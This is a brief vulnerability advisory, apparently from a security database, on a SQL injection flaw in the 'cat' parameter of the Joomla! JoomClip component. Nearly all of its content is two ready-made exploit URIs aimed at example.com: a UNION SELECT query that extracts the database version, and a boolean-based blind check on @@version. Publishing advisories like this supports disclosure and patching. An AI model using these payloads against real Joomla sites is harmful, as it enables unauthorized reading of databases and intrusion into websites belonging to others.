Joomla! JoomClip Component 'cat' Parameter SQL Injection Vulnerability

Joomla! JoomClip Component 'cat' Parameter SQL Injection Vulnerability

Attackers can use a browser to exploit this issue.

The following example URIs are available:

http://www.example.com/index.php?option=com_joomclip&view=thumbs&cat=20%20union%20all%20select%201,2,3,version%28%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18--

http://www.example.com/index.php?option=com_joomclip&view=thumbs&cat=20%20and%20substring%28@@version,1,1%29=4